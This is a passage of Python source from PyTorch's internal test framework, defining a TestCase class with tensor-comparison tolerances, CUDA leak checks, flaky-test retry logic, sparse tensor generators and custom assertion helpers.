if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU or CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
torch.set_warn_always(old_val)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to early terminate test suite if unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# CUDA device side error will cause subsequence test cases to fail.
# stop entire test suite if catches RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError as rte:
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
# Recursive function that incorporates retry logic when PYTORCH_RETRY_TEST_CASES=1 and enables early test
# termination. [DISCLAIMER: ONLY WORKS WITH UNITTEST]
# When report_only is True, flaky tests are only reported, but the signal remains the same (the test will still
# show up red).
# Otherwise, the flaky test will show up green while its stats are captured by test reports.
def _run_with_retry(self, result=None, num_runs_left=0, report_only=True):
if num_runs_left == 0:
return
using_unittest = isinstance(result, unittest.TestResult)
if using_unittest:
failures_before = 0 if result is None else len(result.failures) # num tests marked as failed before starting
errors_before = 0 if result is None else len(result.errors) # num tests marked as errored before starting
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
result.stop()
if not RETRY_TEST_CASES or not using_unittest:
return
err = sys.exc_info()
num_retries_left = num_runs_left - 1
if failures_before < len(result.failures):
print(f" {self._testMethodName} failed - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.failures.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif errors_before < len(result.errors):
print(f" {self._testMethodName} errored - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.errors.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif report_only and num_retries_left < MAX_NUM_RETRIES:
print(f" {self._testMethodName} succeeded - num_retries_left: {num_retries_left}")
result.addUnexpectedSuccess(self)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
def run(self, result=None):
num_runs = MAX_NUM_RETRIES + 1 if RETRY_TEST_CASES else 1
self._run_with_retry(result=result, num_runs_left=num_runs, report_only=not OVERRIDE_FLAKY_SIGNAL)
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
while counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
elements. To achieve this, the sampling method is built-up on
using a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
filled with counts to meet the nnz contraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
# that appers to give exaxt result for all x values
# less than 2**35, at least, the upper limit of x is
# TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
sparse_dim = 2
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
assert len(size) == sparse_dim
def random_sparse_csr(n_rows, n_cols, nnz):
crow_indices = self._make_crow_indices(n_rows, n_cols, nnz, device=device, dtype=index_dtype)
col_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_rows):
count = crow_indices[i + 1] - crow_indices[i]
col_indices[crow_indices[i]:crow_indices[i + 1]], _ = torch.sort(
torch.randperm(n_cols, dtype=index_dtype, device=device)[:count])
values = make_tensor([nnz], device=device, dtype=dtype, low=-1, high=1)
return values, crow_indices, col_indices
values, crow_indices, col_indices = random_sparse_csr(size[0], size[1], nnz)
return torch.sparse_csr_tensor(crow_indices,
col_indices,
values, size=size, dtype=dtype, device=device)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
return t.coalesce().to_dense()
# Compares a torch function with a reference function for a given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
n_inp, n_args, n_kwargs = sample_input.numpy()
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
rtol = cast(float, rtol)
atol = cast(float, atol)
assert atol is not None
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
return _compare_scalars_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Construct assert messages basd on internal debug message and user provided message.
def _get_assert_msg(self, msg, debug_msg=None):
if msg is None:
return debug_msg
else:
return f"\n{msg}" if debug_msg is None else f"{debug_msg}\n{msg}"
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def _is_dict(self, obj):
return isinstance(obj, (dict, torch._C.ScriptDict)) # type: ignore[attr-defined]
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified, then the other must be too"
debug_msg: Optional[str] = None
if x is None or y is None:
self.assertTrue(x is None and y is None)
# Tensor x Number and Number x Tensor comparisons
elif isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
debug_msg = ("Attempted to compare with different is_sparse settings: "
f"Expected: {x.is_sparse}; Actual: {y.is_sparse}.")
super().assertEqual(x.is_sparse, y.is_sparse, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
debug_msg = ("Attempted to compare with different is_quantized settings: "
f"Expected: {x.is_quantized}; Actual: {y.is_quantized}.")
super().assertEqual(x.is_quantized, y.is_quantized, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
if x.is_sparse:
if x.size() != y.size():
debug_msg_sparse = ("Attempted to compare equality of tensors with different sizes: "
f"Expected: {x.size()}; Actual: {y.size()}.")
super().assertTrue(False, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg_sparse))
x = x.coalesce()
y = y.coalesce()
indices_result, debug_msg_indices = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result:
assert debug_msg_indices is not None
debug_msg = "Sparse tensor indices failed to compare as equal! " + debug_msg_indices
super().assertTrue(indices_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
values_result, debug_msg_values = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result:
assert debug_msg_values is not None
debug_msg = "Sparse tensor values failed to compare as equal! " + debug_msg_values
super().assertTrue(values_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg_compare = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_compare is not None
debug_msg = "Quantized representations failed to compare as equal! " + debug_msg_compare
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
result, debug_msg_generic = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_generic is not None
debug_msg = "Tensors failed to compare as equal!" + debug_msg_generic
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif isinstance(x, (np.ndarray, torch.Tensor)) or isinstance(y, (np.ndarray, torch.Tensor)):
def maybe_to_tensor(a: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:
if not isinstance(a, np.ndarray):
return a
try:
return torch.from_numpy(a)
except TypeError:
# This happens if the dtype is non-numeric or not supported by torch
return a
def maybe_to_list(a: Any) -> Any:
if not isinstance(a, (np.ndarray, torch.Tensor)):
return a
return a.tolist()
x = maybe_to_tensor(x)
y = maybe_to_tensor(y)
if isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
self.assertEqual(
x, y, atol=atol, rtol=rtol, msg=msg, exact_dtype=exact_dtype, exact_device=exact_device
)
else:
# In case we can't convert the array to a tensor, we fall back to comparing x and y as iterables
self.assertEqual(
maybe_to_list(x),
maybe_to_list(y),
atol=atol,
rtol=rtol,
msg=msg,
exact_dtype=exact_dtype,
exact_device=exact_device
)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
debug_msg = ("Attempted to compare [string] types: "
f"Expected: {repr(x)}; Actual: {repr(y)}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif type(x) == set and type(y) == set:
debug_msg = ("Attempted to compare [set] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif self._is_dict(x) and self._is_dict(y):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
debug_msg = ("Attempted to compare [type] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif is_iterable(x) and is_iterable(y):
debug_msg = ("Attempted to compare the lengths of [iterable] types: "
f"Expected: {len(x)}; Actual: {len(y)}.")
super().assertEqual(len(x), len(y), msg=self._get_assert_msg(msg, debug_msg=debug_msg))
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
super().assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg_scalars = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result:
assert debug_msg_scalars is not None
debug_msg = "Scalars failed to compare as equal! " + debug_msg_scalars
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
super().assertEqual(x, y, msg=msg)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
